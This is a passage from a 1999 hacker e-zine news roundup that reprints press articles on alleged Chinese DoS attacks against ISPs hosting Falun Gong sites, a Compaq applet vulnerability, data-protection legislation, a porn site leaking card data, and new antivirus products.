  7692.      Chinese government offices in Beijing and now accuse "Chinese government crackers
  7693.      with a political agenda" as Wired puts it. The attacks are thought to be motivated
  7694.      because of the ISPs hosting sites of the, last week in China outlawed, Falun Gong
  7695.      religious group. Full story below. 
  7696.      
  7697.      http://www.wired.com/news/news/politics/story/21030.html
  7698.      
  7699.      ISPs Accuse China of Infowar
  7700.      by Oscar S. Cisneros 
  7701.      
  7702.      12:00 p.m.  30.Jul.99.PDT
  7703.      Two Canadian ISPs said Friday that their networks were attacked this week by Chinese government crackers with a political agenda. 
  7704.      
  7705.      "The hack attempts I could trace [originated with] Chinese government offices in Beijing," said Eric Weigel, director of Bestnet Internet, a Hamilton,
  7706.      Ontario-based ISP. 
  7707.      
  7708.      Weigel said he suspected that the "denial of service" attack, which ended at 4 a.m. EST Friday, was motivated by his organization's hosting a Web
  7709.      site for a religious group outlawed in China. 
  7710.      
  7711.      "I know the Chinese government doesn't like the Falundafa Gong religion. They've arrested some people, but I don't know if anybody's been shot." 
  7712.      
  7713.      The Chinese government last week banned the "wheel of law," or Falun Gong, sect, stating that the group corrupted people's minds, disrupted
  7714.      social order, and sabotaged stability. The nation's state-run television network launched a negative media blitz against Falun Gong. 
  7715.      
  7716.      The group, which claims more than 2 million members, advocates meditation and exercise. In April, in a protest at Beijing's Zhongnanhai leadership
  7717.      compound, more than 10,000 Falun Gong members demanded protection for their religion. The government responded by destroying more than a
  7718.      million of the sect's books, tapes, and CDs. 
  7719.      
  7720.      If Weigel's hunch is correct, that fury has now extended into the world of the Internet. 
  7721.      
  7722.      "The Chinese government didn't even phone me up and say, 'Please remove this site,'" Weigel said. "That's pretty rude." 
  7723.      
  7724.      Weigel said he traced the hack attacks back to the Beijing Application Institute for Information Technology and the Information Center of Xin An
  7725.      Beijing. 
  7726.      
  7727.      The attackers used two common techniques to take on Bestnet and Nebula Internet Services, a smaller ISP in the nearby town of Burlington: They
  7728.      attempted to penetrate the ISPs' systems and also to flood their servers with incomplete requests for data -- a technique that overwhelms a Web
  7729.      server such that it is unable to serve up a Web site (in this case, Falun Gong's). 
  7730.      
  7731.      Neither effort was successful at Bestnet, Weigel said. But the denial of service attack did thwart Nebula Internet Services, which hosted Falun
  7732.      Gong's site until last week. 
  7733.      
  7734.      "They didn't have enough bandwidth to handle them, plus they're using a Windows machine," said Weigel. "I couldn't even copy the site using FTP
  7735.      -- they had to physically bring the files on a hard drive." 
  7736.      
  7737.      Nebula's owner, Greg Alexander, said that the attacks started a month ago and coincided with media reports of a government crackdown on the
  7738.      sect. 
  7739.      
  7740.      "The Chinese government has called the Falun Gong an enemy of the state and so we assumed that it's the Chinese government," he said. "They
  7741.      actually swamped our lines for two days -- we were maxed right out." 
  7742.      
  7743.      Alexander also said a US Department of Transportation official contacted him to ask about an attack on a server at the Federal Aviation
  7744.      Administration. The unnamed official told him that the "probe" of the FAA's server originated from one of Nebula's machines. Alexander added that
  7745.      the specific IP address was at the time assigned to Falun Gong. 
  7746.      
  7747.      "We didn't have control of our own IP address," he said. 
  7748.      
  7749.      The Department of Transportation could not be reached for comment late Friday afternoon. Alexander speculated that if someone made the attack
  7750.      look as if it originated from Falun Gong's IP address, they did so to make "the US government think that these people are bad people." 
  7751.      
  7752.      Reuters contributed to this report. 
  7753.      
  7754.      @HWA
  7755.      
  7756. 52.0 PETERSEN INTERVIEW: TRADING CYBERCRIME FOR CYBERPORN
  7757.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  7758.      
  7759.      From http://www.net-security.org/
  7760.      
  7761.      by Thejian, Saturday 31st July 1999 on 0:30 am CET
  7762.      Recently released hacker and FBI informant Justin Petersen, in an "exclusive
  7763.      interview" with CNN and Time, is claiming to leave behind a life of cybercrime to go
  7764.      into the cyberporn business. CNN will air the interview on Sunday and Monday at 8
  7765.      pm ET and 10 pm PT. ZDNet. 
  7766.      
  7767.      http://www.zdnet.com/zdnn/stories/news/0,4586,2306588,00.html
  7768.      
  7769.       --------------------------------------------------------------
  7770.       This story was printed from ZDNN,
  7771.       located at http://www.zdnet.com/zdnn.
  7772.       --------------------------------------------------------------
  7773.       
  7774.       Hacker turning to a life of porn
  7775.       By Joel Deane, ZDNN
  7776.       July 30, 1999 3:02 PM PT
  7777.       URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2306588,00.html?chkpt=zdnnstop
  7778.       
  7779.       Former hacker and FBI informant Justin Petersen is back in the news -- claiming that he is leaving
  7780.       behind a life of cybercrime to join the cyberporn business. 
  7781.       
  7782.       CNN and Time is promoting an "exclusive interview" with Petersen, who gained notoriety for
  7783.       informing on hackers Kevin Mitnick and Kevin Poulsen, and was recently released from prison
  7784.       after spending time in custody for parole violations. 
  7785.       
  7786.       According to a CNN press release, Petersen talks at length about his life as a "high-tech thief" and
  7787.       Internet pioneer, saying he was "trolling around on the information superhighway when it was just a
  7788.       dirt road." Petersen has multiple convictions for computer crimes, including an attempted
  7789.       electronic bank heist. 
  7790.       
  7791.       But Petersen tells CNN he now plans to begin a new life online, free of crime, with an adult Web
  7792.       site. The interview airs on CNN Sunday and Monday at 8 p.m. ET and 10 p.m. PT. 
  7793.      
  7794.      @HWA
  7795.      
  7796. 53.0 GHOSTS IN THE MACHINE
  7797.      ~~~~~~~~~~~~~~~~~~~~~ 
  7798.      
  7799.      From http://www.net-security.org/
  7800.  
  7801.      by Thejian, Friday 30th July 1999 on 5:30 pm CET
  7802.      Fact: PCs come with dangerous security holes. One of the major problems still is the
  7803.      scripting ability of machines, the ability to run applets and all of this in combination
  7804.      with the Web represent some serious security and privacy issues of which the
  7805.      regulare home user is not always aware of. And it doesn't stop there. This article
  7806.      discusses this with some examples and quotes from major manufacturers. Read it
  7807.      below. 
  7808.      
  7809.      http://www.wired.com/news/news/technology/story/20995.html
  7810.      
  7811.      Ghosts in the Machine
  7812.      by Chris Oakes 
  7813.      
  7814.      3:00 a.m.  30.Jul.99.PDT
  7815.      When Richard Smith bought a new Compaq Presario last Friday, he suspected there might be a few holes in the security of the computer's Internet
  7816.      software. 
  7817.      
  7818.      Sure enough. Within ten minutes of booting up the PC, Smith had flushed out the software equivalent of an assassin for hire. 
  7819.      
  7820.      "I think this is one of the worst problems I've ever seen," said Smith, who has made a side-career during the last year of sniffing out major software
  7821.      holes. 
  7822.      
  7823.           
  7824.      Compaq had granted its Internet software potent capabilities. A clever Web page or email message could put out an electronic hit on an unwitting
  7825.      Presario owner using a software demon that comes in the guise of an applet. 
  7826.      
  7827.      The applet, called "SpawnApp," was installed by Compaq on its Presario line of PCs as part of its customer service applications. 
  7828.      
  7829.      While Compaq intended to streamline customer support over the Net using handy Web tools -- Internet Explorer 4 and Java applications -- the
  7830.      company unwittingly put its customers at risk. 
  7831.      
  7832.      "All you need is a little bit of JavaScript to misuse the control. They've left it wide open, so you can run anything. You can give a delete command
  7833.      that deletes everything in the [Windows] My Documents directory." 
  7834.      
  7835.      "Anybody can use it because [Compaq's] told the world it's a safe thing." 
  7836.      
  7837.      SpawnApp is a bridge, launching any DOS or Windows application. With simple coding, a rogue programmer could access the Java applet from the
  7838.      Net to launch any application on the computer. Programmers could use the applet to mess up some data -- perhaps nab some files and email
  7839.      messages, or change the PC's security settings for further breaches. 
  7840.      
  7841.      The problem is apparently the tip of an iceberg that may plague more PCs than even manufacturers know. These ghosts in the software machine
  7842.      only get noticed when people like Smith do some digging. Companies often don't respond in force to alarms until the media spreads the word. 
  7843.      
  7844.      Smith said he wasn't the first to arrive on the scene of the dangerous applet. Another programmer, Frank Farance, originally discovered the applet
  7845.      in November 1998, and yet the problem remained. 
  7846.      
  7847.      Smith turned up a similar vulnerability on Hewlett-Packard's Pavilion line of PCs only a week earlier. HP moved quickly and provided a fix; Compaq is
  7848.      considering doing the same. 
  7849.      
  7850.      With or without fixes, Smith sees the trend as a dangerous one. 
  7851.      
  7852.      "If you take HP and Compaq together, they're in the top three or four manufacturers in the United States. They've both been shipping machines for
  7853.      a year which have pretty big openings ... So you've got some pretty big players messing up here." 
  7854.      
  7855.      Compaq "signed" its applet, which is a standard security function meant to indicate the program's tasks were designed by the company and
  7856.      therefore safe to execute. But because further steps weren't taken, anyone could misuse the potentially dangerous set of functions, Smith said. 
  7857.      Compaq confirmed that under some scenarios, the user may not see any warning if their browser or email program were to encounter malicious code
  7858.      that invokes the applet. 
  7859.      
  7860.      "Compaq is looking at the possibility of updating [the system software] so that something like this could not occur," said Jim Ganthier, director of
  7861.      engineering for Presarios. 
  7862.      
  7863.      He called the actual exploitation of the security hole highly unlikely, however. 
  7864.      
  7865.      Smith said a simple solution to the problem is to delete the .REG (registry) file that makes Compaq a trusted publisher. That file can be found by the
  7866.      name CERTREG.REG, he said. 
  7867.      
  7868.      Smith contends the security hole is the latest -- and most serious -- in a growing legacy of dangerous knotholes in standard-issue PC software. 
  7869.      
  7870.      Other holes have largely centered on potential access to personal data, such as Microsoft's extraction of hardware-tracking ID numbers during the
  7871.      Windows registration process. 
  7872.      
  7873.      Smith and others have also turned up a myriad JavaScript and ActiveX vulnerabilities that can crack a PC's file directories by way of Netscape
  7874.      Navigator or Internet Explorer. 
  7875.      
  7876.      Smith considers the latest example severe because of the ability to launch any application on the PC -- without the user ever noticing. 
  7877.      
  7878.      So with all these dangers -- caught only when a programmer like Smith pays close attention -- what are the prospects for security in a networked,
  7879.      e-commerce age? 
  7880.      
  7881.      The current chain of events -- discovery, disclosure, and company reaction -- is the best, according to free marketeer Justin Matlick, author of
  7882.      Governing Internet Privacy: A Free Market Primer. 
  7883.      
  7884.      "The best solution is going to let privacy-conscious consumers and organizations ferret these problems out and force the companies or industries to
  7885.      respond," Matlick said. "I think that the free market is much more responsive to these concerns than regulation could ever hope to be." 
  7886.      
  7887.      If that means consumers can expect only a certain level of security on the computers they buy, so be it. 
  7888.      
  7889.      "It's more important to me to use the product than it is to protect my privacy -- up to a certain level," Matlick said. 
  7890.      Brooke Partridge, electronic support programs manager for Hewlett-Packard, agrees. 
  7891.      
  7892.      "We're not going to sell a lot of computers if people are worried about whether or not our systems allow access to their information. Really there is
  7893.      an inherent economic incentive." 
  7894.      
  7895.      Trust the market to find and fix holes in time? Nay, industry regulation is the only fix, if you ask electronic privacy advocate Jason Catlett. 
  7896.      
  7897.      "That's completely wrong. There are far too few people paying attention to this to bring even a hundredth of the incidents to the attention of the
  7898.      media -- or even the companies themselves." 
  7899.      
  7900.      The public has a right to a baseline standard of behavior that's determined by the best principles, Catlett argues. 
  7901.      
  7902.      "All that's needed is a simple private right of action for individuals." For example, a PC customer should have the right to go after a company for
  7903.      US$500 if his data is exposed by negligence, he said. 
  7904.      
  7905.      "That simple economic incentive would make a lot of companies clean up their act. That's exactly one of the risks that they should have as a
  7906.      routine part of their engineering." 
  7907.      
  7908.      Nancy Wong of the Critical Infrastructure Assurance Office said information technology moves too fast for regulations. 
  7909.      
  7910.      "There are so many different ways of opening up systems and inserting vulnerabilities unknowingly that it's very difficult to say that government
  7911.      regulation is going to be able to address that. 
  7912.      
  7913.      "One of the reasons why I believe it's [a reactive situation] right now is because people really aren't thinking about security on an ongoing basis, or
  7914.      making systems secure at the same time they install systems." 
  7915.      Meanwhile, Peter Neumann, a scientist with SRI International and a consultant to the President's Commission on Critical Infrastructure Protection,
  7916.      said Smith's findings are not news -- and only a fraction of the story. 
  7917.      
  7918.      "Computer security is an oxymoron -- it doesn't exist. It's a joke. There's no way of fixing it short of producing new operating systems." 
  7919.      
  7920.      Neumann predicts that e-commerce will fall on its face when massive dollar transactions begin to depend on the security of today's inadequate
  7921.      networked PCs. For true network security, airtight components like encryption must be built into any Internet computer, Neumann said. 
  7922.      
  7923.      "When millions or trillions of dollars [are] going down the tube, people will start paying attention." 
  7924.      
  7925.      But according to Compaq's Ganthier, all this worrying is overblown. Vulnerabilities are one thing; actual exploitation is another. 
  7926.      
  7927.      "There's a whole bunch of if-then-else statements in there. To me it's like the Intel processor's serial numbers -- nobody's actually been able to
  7928.      demonstrate [an exploit]." 
  7929.      
  7930.      Software sleuth Smith said Ganthier's argument is true enough, but only for the time being. 
  7931.      
  7932.      "I've been looking at virus stuff for a while, but it's only been since the beginning of 1999 that virus writers have been exploiting email. Yet the
  7933.      capabilities have been there for three or four years." 
  7934.      
  7935.      Everyday sabotage exploits may be just down the road in a cyber-crime future. 
  7936.      
  7937.      "We just can't say," Smith said. "But we just need to close them up. There are a lot of vulnerabilities out there -- we just can't say which one is
  7938.      the one that will be used." 
  7939.      
  7940.      @HWA
  7941.      
  7942.      
  7943. 54.0 DATABASE PROTECTIONS OK-D
  7944.      ~~~~~~~~~~~~~~~~~~~~~~~~~ 
  7945.      
  7946.      From http://www.net-security.org/
  7947.  
  7948.      by Thejian, Friday 30th July 1999 on 3:00 am CET
  7949.      A bill which is supposed to give providers of database information a weapon against
  7950.      electronic pirates and hackers got approved by a House panel yesterday. The bill
  7951.      gives the FTC the authority to prevent people from obtaining and distributing
  7952.      databases without permission and gives disseminators of real-time stock market
  7953.      information the right to sue hackers and pirates for that same offense. Full story below. 
  7954.      
  7955.      http://www.news.com/News/Item/0,4,39929,00.html?st.ne.fd.tohhed.ni
  7956.      
  7957.      Commerce subcommittee OKs database protections 
  7958.      By Bloomberg News
  7959.      Special to CNET News.com
  7960.      July 29, 1999, 3:15 p.m. PT 
  7961.  
  7962.      WASHINGTON--A House panel approved a bipartisan bill to give providers of database information such as mortgage
  7963.      rates or stock quotes a weapon against electronic pirates and hackers.
  7964.  
  7965.      The measure, passed on voice vote by the Telecommunications, Trade, and Consumer Protections Subcommittee, gives the
  7966.      Federal Trade Commission authority to prevent people from obtaining and distributing databases without permission. 
  7967.  
  7968.      A section of the bill, approved last week by the same committee, gives stock exchanges and other disseminators of real-time
  7969.      stock market information the right to sue hackers and pirates.
  7970.  
  7971.      "This bill would, for the first time ever, create a federal stop sign to database privacy," said Rep. Tom Bliley (R-Virginia), who
  7972.      sponsored the bill. "But just as important, the bill will continue to protect consumers' access to information."
  7973.  
  7974.      A coalition of database owners, including financial data compilers, Internet companies, universities, and libraries, has lobbied in
  7975.      favor of the Bliley bill. Bloomberg, the parent company of Bloomberg News, has testified in favor of the bill.
  7976.  
  7977.      "[The bill] represents another arrow...you can seek if your information has been illegally pirated," said Skip Lockwood, coordinator
  7978.      of the Digital Futures Coalition, a lobbying firm that represents the shared interests of the educational and research communities
  7979.      and the computer industry.
  7980.  
  7981.      Support for an alternative bill
  7982.      The New York Stock Exchange, the National Association of Realtors, and other owners of large databases have championed
  7983.      another bill with broader information protections.
  7984.  
  7985.      That bill, sponsored by Rep. Howard Coble (R-North Carolina), has passed the full Judiciary Committee and is awaiting
  7986.      consideration by the full House. The Coble bill affords a wider range of legal protection to database compilers than the Bliley bill,
  7987.      said Edward Miller, policy analyst for the National Association of Realtors.
  7988.  
  7989.      Coble's bill allows database creators to go after pirates through the courts, while the Bliley bill puts the FTC in charge of policing
  7990.      piracy on most databases. The FTC bureaucracy could bog down attempts by real estate agencies to go after hackers who steal
  7991.      their listings, Miller said.
  7992.  
  7993.      In addition, the Bliley bill's definition of "database" could allow pirates to take substantial portions of information with no
  7994.      consequences, he said.
  7995.  
  7996.      "To us, [the Bliley Bill] looks like they have provided a textbook on how to pirate data and do it legally," Miller said. "It's just the
  7997.      wrong approach."
  7998.  
  7999.      Internet companies such as Yahoo and Lycos and financial data companies such as Bloomberg oppose Coble's bill because they
  8000.      say it gives too much protection to companies that compile information, such as the NYSE. They also think it will concentrate
  8001.      ownership of facts in the hands of a few, Lockwood said.
  8002.  
  8003.      "With Coble's bill, there's nothing through the Internet pipelines. There's nothing to pass around," Lockwood said. "You are going
  8004.      to allow a few large owners of mass amounts of information to lock out everybody else."
  8005.  
  8006.      Digital signatures
  8007.      The telecommunications subcommittee also unanimously approved legislation today to give electronic signatures the same legal
  8008.      validity as those penned in ink. The bill would allow e-commerce and trades to take place online without requiring handwritten
  8009.      signatures for documentation.
  8010.  
  8011.      The electronic signatures bill doesn't set a standard for what types of technology would be acceptable as "signatures." While
  8012.      electronic pens, fingerprint scanners, and iris scanners are all currently available, legislators said they didn't want to stifle the
  8013.      technology by setting a standard before the electronic signatures industry had fully developed.
  8014.  
  8015.      Last week, the subcommittee added an amendment to the electronic signatures bill allowing the Securities and Exchange
  8016.      Commission to still require some records filed with the agency to be signed by hand.
  8017.  
  8018.      If the Commerce Committee approves the subcommittee's two bills, they will be submitted to the full House. 
  8019.  
  8020.      Copyright 1999, Bloomberg L.P. All Rights Reserved. 
  8021.  
  8022.      @HWA
  8023.      
  8024. 55.0 YET ANOTHER SITE SPITTING OUT PERSONAL INFO
  8025.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8026.      
  8027.      From http://www.net-security.org/
  8028.  
  8029.      by Thejian, Friday 30th July 1999 on 2:20 am CET
  8030.      An adult Web site is, due to a malconfiguration, spitting out the names, addresses,
  8031.      emails and credit card numbers of nearly 1000 of its members to anyone with a Web
  8032.      browser. This story also once again proves some people's unwillingness to put some
  8033.      effort in security, "I had informed them about this security issue ... but for some
  8034.      reason they needed to have ... [the site set up that way]." Story below.      
  8035.      
  8036.      http://www.wired.com/news/news/culture/story/21001.html
  8037.      
  8038.       Italian Smut Site Left Unzipped
  8039.       by James Glave 
  8040.       
  8041.       2:45 p.m.  29.Jul.99.PDT
  8042.       An adult Web site run by the man who launched the career of Italian porn queen Cicciolina is showing more than just cheek. 
  8043.       
  8044.       It's also revealing the names, addresses, emails, and credit card numbers of nearly 1,000 of its members. 
  8045.       
  8046.       The site, Diva Futura, is configured in such a manner that several databases containing confidential user information can be easily accessed by
  8047.       anyone with a Web browser. 
  8048.       
  8049.       Diva Futura is owned by Italian porn king Riccardo Schicci, who last November was jailed in Italy on charges of running a prostitution racket. He is
  8050.       widely credited as the man who brought the porn movie industry to Italy. 
  8051.       
  8052.       "As soon as I figured out that was [Schicci's] site, I smelled something bad and figured out that I wanted to get away," said a former Diva Futura
  8053.       member, now a student of European Studies at a Washington DC university. 
  8054.       
  8055.       "I was so stupid and I was right," said the man, who spoke on condition of anonymity. "I did this thing two years ago when this kind of stuff was
  8056.       starting, and now I don't leave my credit card in any adult sites." 
  8057.       
  8058.       Schicci was released from prison soon after he was incarcerated. Efforts to reach Diva Futura's current site administrators were unsuccessful and
  8059.       the page remained vulnerable as of Friday morning. 
  8060.       
  8061.       Until recently, Web Creations, a New Jersey Web development firm, hosted the site. 
  8062.       
  8063.       But the man listed as the site administrator in the Internet Network Information Center database said that the site's current owner had not paid the
  8064.       firm's past-due bill. Anil Gurnani said that the site's owners have moved the operation elsewhere. 
  8065.       
  8066.       Gurnani told Wired News in an email, "This site is maintained by the client." 
  8067.       
  8068.       He said that the site's technicians knew of the security issue and insisted on leaving the site configured that way. "I had informed them about this
  8069.       security issue ... but for some reason they needed to have ... [the site set up that way]." 
  8070.       
  8071.       "This utter and complete lack of respect for private financial data is beyond reprehensible," said the Australian Web site developer who discovered
  8072.       the problem. "It is wildly reckless, and I find it inexcusable," he said in an email directed to the site's administrators. 
  8073.       
  8074.       Responding to an email query, one member of the site said that e-commerce is still not widespread in Italy. The member, who lives in Pavia, Italy,
  8075.       said in broken English that he hoped the site would be fixed soon, but took the whole matter in stride. 
  8076.       
  8077.       "What can I say?" he wrote. "Me and my friends a night still surfing on the Net, and we seek that URL ... you know who the Italians are ... geek ...
  8078.       really attracted about sex and so on, so I put my [card] number [on] the Net." 
  8079.       
  8080.       An examination of the site's data reveals that between December 1997 and June 1998, the site handled approximately US$22,000 worth of
  8081.       membership transactions. 
  8082.       
  8083.       As a member of the European Union, Italy is a signatory to the Data Protection Directive, a series of rules that protect the personal data of
  8084.       European consumers. 
  8085.       
  8086.       Article 17 of the directive compels companies to secure the personal data of their customers, though specific enforcement measures are left to the
  8087.       discretion of each member nation. 
  8088.       
  8089.       Diva Futura hosts images from Italian adult magazines Diva Futura, Bamby, Fans Club, and Le Aventure di Eva Henger. It also features streaming
  8090.       video, chat, and many images of Ilona Staller, more commonly known as Cicciolina. 
  8091.       
  8092.       Agence France Presse last fall reported that in 1989 Riccardo Schicci spent time in prison for shooting a hard-core porno film on a public beach. 
  8093.       
  8094.       Editor's Note: This story has been corrected. The original article incorrectly stated that Riccardo Schicci was once married to Cicciolina. Wired
  8095.       News regrets the error. 
  8096.       
  8097.       @HWA
  8098.       
  8099. 56.0 CALIFORNIA ADOPTS DIGITAL SIGNATURE LAW
  8100.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  8101.      
  8102.      From http://www.net-security.org/
  8103.           
  8104.      by Thejian, Friday 30th July 1999 on 1:30 am CET
  8105.      Gov. Gray Davis yesterday signed a bill into a California law which allows contracts
  8106.      with electronic signatures to count as legal documents. The new law applies to firms
  8107.      doing business in California and their customers in all 50 states, according to a
  8108.      statement released by one of the bill's sponsors ETrade Group Inc. Read more. 
  8109.      
  8110.      http://www.computerworld.com/home/news.nsf/all/9907294dig
  8111.      
  8112.      Calif. adopts digital-signature law
  8113.      By Kathleen Ohlson
  8114.  
  8115.  
  8116.      California brokerage firms may enter into contracts with
  8117.      their customers through digital signatures, rather than
  8118.      filling out a pile of paperwork. 
  8119.  
  8120.      Gov. Gray Davis yesterday signed into California law a
  8121.      bill that allows contracts with electronic signatures to
  8122.      count as legal documents, according to a statement
  8123.      from ETrade Group Inc., one of the sponsors of the bill.
  8124.      The new law applies to firms that conduct business in
  8125.      California and their customers in all 50 states, ETrade
  8126.      said. 
  8127.  
  8128.      The Menlo Park, Calif.-based brokerage plans to use
  8129.      digital signatures to open and transfer customer account
  8130.      information, as well as add new privileges, such as
  8131.      margin agreements, ETrade said. The company doesn't
  8132.      know which digital signature technology it will use, but
  8133.      expects to use digital signatures "sometime in 1999,"
  8134.      said Tim Alban, a spokesman for ETrade. 
  8135.  
  8136.      Gomez Advisors' John Robb said while brokerages may
  8137.      sign up customers faster, they will have to overcome a
  8138.      few obstacles. There isn't any good digital signature
  8139.      technology available now for such applications, and
  8140.      digital signatures are currently not widely adopted, Robb
  8141.      said. Adopting digital signatures is a "state-by-state
  8142.      battle," since brokerages need to register in each state
  8143.      individually. However, this law is a "good first step," he
  8144.      added. 
  8145.  
  8146.      Online brokerages will benefit if they can automate more
  8147.      account processing and keep costs down, Robb said. 
  8148.  
  8149.      @HWA      
  8150.      
  8151. 57.0 NEW AMMO AGAINST VIRUSES
  8152.      ~~~~~~~~~~~~~~~~~~~~~~~~
  8153.      
  8154.      From http://www.net-security.org/
  8155.  
  8156.      by Thejian, Friday 30th July 1999 on 1:00 am CET
  8157.      When Melissa hit, a lot of companies just pulled the plug on their (e-mail) servers,
  8158.      losing a lot of money because of this. This is definately not the way to go in the future
  8159.      according to the security branch which is shown in the latest network security
  8160.      products. A more proactive way of working is needed and that's just what these new
  8161.      products claim to bring you. ZDNet.      
  8162.      
  8163.      http://www.techweb.com/wire/story/TWB19990729S0019
  8164.      
  8165.      More Ammunition Used In Fight Against Viruses
  8166.      By David Drucker, InternetWeek
  8167.      Jul 29, 1999 (2:40 PM)
  8168.      
  8169.      URL: http://www.techweb.com/wire/story/TWB19990729S0019 
  8170.      
  8171.      In hindsight, IT managers weathered the Melissa virus pretty well. Even so, theirdefensive tactics were less than optimal.
  8172.      
  8173.      "A lot of people just disconnected [their e-mail servers], and that can't happen in the future," said Hurwitz Group analyst Diana Kelley. "The pulling-the-plug option is
  8174.      going to mean a huge loss of business, so being more proactive is going to be the way to go." 
  8175.      
  8176.      The latest network security products are designed just for that purpose. 
  8177.      
  8178.      Trend Micro is readying version 3.0 of ScanMail for Exchange, which includes tools to block unwanted file traffic until vendor patches are delivered. 
  8179.      
  8180.      When a virus outbreak begins, antivirus vendors usually design patches specifically for the new virus and distribute them to customers within a few hours. But the
  8181.      delay can be long enough to significantly stall operations. 
  8182.      
  8183.      "What we've learned from Melissa is that companies can't wait until we come up with a pattern file," said Dan Schrader, Trend Micro's vice president for new
  8184.      technology. 
  8185.      
  8186.      ScanMail for Exchange 3.0 includes the eManager plug-in, a set of content-filtering controls that let users block files based on details such as file type, file name, or
  8187.      specific wording within messages. 
  8188.      
  8189.      David Shaffer, IT manager at Power Construction, began using ScanMail a year ago when his company implemented Microsoft Exchange for its mail system. He
  8190.      said he believes the new features in version 3.0 will help him act faster the next time a major virus hits. 
  8191.      
  8192.      "This gives us a way to respond in those critical three or four hours before a patch can be released, without shutting down internal or external mail," Shaffer said. 
  8193.      
  8194.      Network Associates is also juicing up its virus-protection software. The updated version of GroupShield for Exchange can detect previously unknown viruses
  8195.      without raising excessive false alarms, the company said. The software uses so-called double heuristic technology, which detects new viruses by monitoring virus-like
  8196.      behavior. It is available now.
  8197.      
  8198.      According to a study on virus prevalence recently released by ICSA.net (formerly known as the International Computer Security Association), the rate of virus
  8199.      infections is doubling every year. The study found that a 1,000-person company experiences about 80 virus incidents per month.
  8200.      
  8201.      "espite good antivirus products, it's clear that the risk is growing," said ICSA.net chairman Peter Tippett. 
  8202.      
  8203.      The speed with which viruses are spreading is the biggest danger, Tippett said. 
  8204.      
  8205.      "It used to take a year or two for a virus to become predominant," he said. "Now it takes a day or two for Net-enabled viruses to spread. Users now have very little
  8206.      time to prepare." 
  8207.      
  8208.      Trend Micro's ScanMail for Exchange 3.0 is scheduled to ship Aug. 15. The software is priced at $5,000, without the eManager plug-in, for up to 250 users; the
  8209.      plug-in is an additional $1,250 and can be purchased for previous versions. 
  8210.      
  8211.      Network Associates' GroupShield for Exchange is available as a one-year subscription for 250 to 500 users, at a price of $29 per node, or $19 per node for 5,000
  8212.      or more users. 
  8213.      
  8214.      @HWA
  8215.      
  8216. 58.0 DOE SECRETARY ORDERS SECURITY BREAK
  8217.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8218.  
  8219.      From http://www.net-security.org/
  8220.  
  8221.      by Thejian, Thursday 29th July 1999 on 11:00 pm CET
  8222.      Energy Secretary Bill Richardson will today announce a department-wide work
  8223.      stoppage. This in order to focus more on and increase employee awareness about
  8224.      security issues. This is the third security stand-down this year since the China-affair
  8225.      (China allegedly stole US secrets on nuclear warheads and neutron bombs). Yahoo
  8226.      Dailynews.      
  8227.      
  8228.      http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990729/ts/nuclear_spying_2.html
  8229.      
  8230.      Thursday July 29 12:03 AM ET 
  8231.  
  8232.      Energy Secretary Orders Security Training
  8233.      
  8234.      By Tabassum Zakaria
  8235.      
  8236.      WASHINGTON (Reuters) - Energy Secretary Bill Richardson will announce Thursday a department-wide work stoppage to focus on security issues in August as
  8237.      another step to increase employee awareness since the China spying scandal hit the nuclear labs.
  8238.      
  8239.      The nuclear weapons research laboratories have been the focus of security concerns after a congressional report said China stole U.S. secrets on seven nuclear
  8240.      warheads and the neutron bomb. China has repeatedly denied those allegations.
  8241.      
  8242.      The labs have already had two security stand-downs this year in which work stopped so employees could focus on security issues, and will be exempt from the
  8243.      August action.
  8244.      
  8245.      Every employee must realize ``that every job carries with it a security obligation,'' Richardson said.
  8246.      
  8247.      ``I'm ordering this action to ensure that (the Energy Department) is doing everything possible to protect America's secrets and sensitive technologies,'' he said.
  8248.      
  8249.      Richardson has taken other steps such as creating a ''security czar'' position within the department and hiring a retired four-star general to fill it.
  8250.      
  8251.      The Energy Department has been criticized as having an unwieldy bureaucracy that did not pay enough attention to security concerns raised in past years.
  8252.      
  8253.      And some members of Congress want broader change and have proposed restructuring the Energy Department so the nuclear weapons programs are separated into
  8254.      a semi-autonomous agency within the department. Others have called for totally removing the nuclear programs from the department which considers the labs its
  8255.      ``crown jewels.''
  8256.      
  8257.      Energy Department sites with classified national security activities, excluding the labs, will stop routine work activities on Aug. 3 to participate in a daylong security
  8258.      training.
  8259.      
  8260.      Those sites include the Nevada Test Site, the Y-12 Plant in Oak Ridge, Tennessee, the Kansas City Plant, and the Pantex operation in Amarillo, Texas.
  8261.      
  8262.      By the end of August all other Energy Department facilities, including those that conduct unclassified work, will participate in a similar stand-down.
  8263.      
  8264.      Topics for non-classified areas will include computer network security, responsibilities for hosts of foreign visits, export control regulations, computer hackers and
  8265.      disgruntled employees. 
  8266.      
  8267.      @HWA
  8268.      
  8269. 59.0 EU MEMBERS NOT FOLLOWING DATA-PROTECTION RULES
  8270.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  8271.      
  8272.      From http://www.net-security.org/
  8273.  
  8274.      by Thejian, Thursday 29th July 1999 on 10:30 pm CET
  8275.      The European Commission is proceeding with infringement proceedings against nine
  8276.      member states because of their failure to comply with the data-protection directive
  8277.      that took effect last October. The member states have received a two month delay to
  8278.      comply with the directive before an official complaint will be made to the
  8279.      Luxembourg-based Court of Justice. Full story. 
  8280.      
  8281.      http://www.computerworld.com/home/news.nsf/all/9907294eudata
  8282.      
  8283.      (Online News, 07/29/99 11:43 AM)
  8284.  
  8285.  
  8286.  
  8287.          Most EU states not following
  8288.               data-protection rules
  8289.                       By Elizabeth de Bony
  8290.  
  8291.  
  8292.      BRUSSELS -- The European Commission is
  8293.      proceeding with infringement proceedings against nine
  8294.      member states of the European Union for failing to
  8295.      comply with the data-protection directive that took effect
  8296.      last October, the Commission announced today. 
  8297.  
  8298.      The Commission has given France, Luxembourg, the
  8299.      Netherlands, Germany, the U.K., Ireland, Denmark,
  8300.      Spain and Austria two months to comply with the
  8301.      directive. Failure to meet this deadline will prompt the
  8302.      Commission to proceed with the final stage of EU
  8303.      infringement proceedings involving a complaint to the
  8304.      Luxembourg-based Court of Justice. 
  8305.  
  8306.      Condemnation by the Court of Justice can lead to the
  8307.      imposition of fines. 
  8308.  
